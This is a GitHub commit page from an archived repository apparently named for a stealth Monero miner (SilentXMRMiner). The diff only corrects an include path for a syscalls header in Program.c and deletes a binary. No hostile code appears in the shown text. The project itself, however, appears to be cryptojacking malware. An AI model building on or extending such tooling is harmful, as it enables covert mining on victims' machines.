Skip to content
This repository was archived by the owner on Sep 12, 2023. It is now read-only.

Commit e9f2b32

Browse files
committed
Fixed compiler includes
1 parent 2943bce commit e9f2b32

File tree

2 files changed

+1
-1
lines changed

2 files changed

+1
-1
lines changed
-5.31 KB
Binary file not shown.

SilentXMRMiner/Resources/Program.c

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -2,7 +2,7 @@
22
#include <stdlib.h>
33
#include <windows.h>
44
#include <sys/types.h>
5-
#include "syscalls.h"
5+
#include "Includes/syscalls.h"
66

77
/* Created by Unam Sanctam, https://github.com/UnamSanctam */
88

0 commit comments

Comments
 (0)